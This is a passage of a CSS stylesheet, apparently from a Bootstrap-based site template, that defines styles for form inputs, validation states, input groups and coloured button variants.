input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #eeeeee;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
input.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
selectinput.input-sm {
  height: 30px;
  line-height: 30px;
}
textareainput.input-sm,
select[multiple]input.input-sm {
  height: auto;
}
input.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
selectinput.input-lg {
  height: 45px;
  line-height: 45px;
}
textareainput.input-lg,
select[multiple]input.input-lg {
  height: auto;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  display: table;
  content: " ";
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: left;
    width: 160px;
    padding-top: 5px;
    text-align: right;
  }
}
.form-horizontal .control-group .controls {
  margin-left: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #eeeeee;
  border-radius: 0;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  display: table;
  content: " ";
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-left: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-left: 0;
  vertical-align: top;
  border-radius: 0 0 0 0;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.42857143;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-right: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 0 0 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 0 0 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 0 0 0 0;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-left: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-right: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-left: -1px;
  border-radius: 0 0 0 0;
}
.input-prepend.input-append .btn-group:first-child {
  margin-left: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

fieldset {
  min-width: 0;
  padding: 0;
  margin: 0;
  border: 0;
}
legend {
  display: block;
  width: 100%;
  padding: 0;
  margin-bottom: 20px;
  font-size: 21px;
  line-height: inherit;
  color: #444444;
  border: 0;
  border-bottom: 1px solid #e5e5e5;
}
label {
  display: inline-block;
  max-width: 100%;
  margin-bottom: 5px;
  font-weight: 700;
}
input[type="search"] {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  -webkit-appearance: none;
  appearance: none;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"].form-control,
  input[type="time"].form-control,
  input[type="datetime-local"].form-control,
  input[type="month"].form-control {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: 400;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-top: 4px \9;
  margin-left: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: 400;
  vertical-align: middle;
  cursor: pointer;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
.form-control-static {
  min-height: 34px;
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-right: 0;
  padding-left: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.form-group-sm select.form-control {
  height: 30px;
  line-height: 30px;
}
.form-group-sm textarea.form-control,
.form-group-sm select[multiple].form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  min-height: 32px;
  padding: 6px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.form-group-lg select.form-control {
  height: 45px;
  line-height: 45px;
}
.form-group-lg textarea.form-control,
.form-group-lg select[multiple].form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  min-height: 38px;
  padding: 11px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback,
.input-group-lg + .form-control-feedback,
.form-group-lg .form-control + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback,
.input-group-sm + .form-control-feedback,
.form-group-sm .form-control + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  padding-top: 7px;
  margin-top: 0;
  margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-right: -20px;
  margin-left: -20px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    padding-top: 7px;
    margin-bottom: 0;
    text-align: right;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 20px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 11px;
    font-size: 18px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
    font-size: 12px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  filter: alpha(opacity=65);
  opacity: 0.65;
  -webkit-box-shadow: none;
  box-shadow: none;
}
a.btn.disabled,
fieldset[disabled] a.btn {
  pointer-events: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:focus,
.btn-default.focus {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #8c8c8c;
}
.btn-default:hover {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  background-image: none;
  border-color: #adadad;
}
.btn-default:active:hover,
.btn-default.active:hover,
.open > .dropdown-toggle.btn-default:hover,
.btn-default:active:focus,
.btn-default.active:focus,
.open > .dropdown-toggle.btn-default:focus,
.btn-default:active.focus,
.btn-default.active.focus,
.open > .dropdown-toggle.btn-default.focus {
  color: #333333;
  background-color: #d4d4d4;
  border-color: #8c8c8c;
}
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-primary:focus,
.btn-primary.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-primary:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-primary:active:hover,
.btn-primary.active:hover,
.open > .dropdown-toggle.btn-primary:hover,
.btn-primary:active:focus,
.btn-primary.active:focus,
.open > .dropdown-toggle.btn-primary:focus,
.btn-primary:active.focus,
.btn-primary.active.focus,
.open > .dropdown-toggle.btn-primary.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-primary .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:focus,
.btn-success.focus {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #122e18;
}
.btn-success:hover {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  background-image: none;
  border-color: #255d31;
}
.btn-success:active:hover,
.btn-success.active:hover,
.open > .dropdown-toggle.btn-success:hover,
.btn-success:active:focus,
.btn-success.active:focus,
.open > .dropdown-toggle.btn-success:focus,
.btn-success:active.focus,
.btn-success.active.focus,
.open > .dropdown-toggle.btn-success.focus {
  color: #ffffff;
  background-color: #255d31;
  border-color: #122e18;
}
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:focus,
.btn-info.focus {
  color: #ffffff;
  background-color: #007399;
  border-color: #002633;
}
.btn-info:hover {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  background-image: none;
  border-color: #005875;
}
.btn-info:active:hover,
.btn-info.active:hover,
.open > .dropdown-toggle.btn-info:hover,
.btn-info:active:focus,
.btn-info.active:focus,
.open > .dropdown-toggle.btn-info:focus,
.btn-info:active.focus,
.btn-info.active.focus,
.open > .dropdown-toggle.btn-info.focus {
  color: #ffffff;
  background-color: #005875;
  border-color: #002633;
}
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:focus,
.btn-warning.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-warning:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-warning:active:hover,
.btn-warning.active:hover,
.open > .dropdown-toggle.btn-warning:hover,
.btn-warning:active:focus,
.btn-warning.active:focus,
.open > .dropdown-toggle.btn-warning:focus,
.btn-warning:active.focus,
.btn-warning.active.focus,
.open > .dropdown-toggle.btn-warning.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:focus,
.btn-danger.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-danger:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-danger:active:hover,
.btn-danger.active:hover,
.open > .dropdown-toggle.btn-danger:hover,
.btn-danger:active:focus,
.btn-danger.active:focus,
.open > .dropdown-toggle.btn-danger:focus,
.btn-danger:active.focus,
.btn-danger.active.focus,
.open > .dropdown-toggle.btn-danger.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  font-weight: 400;
  color: #ff8800;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #b35f00;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-block {
  display: block;
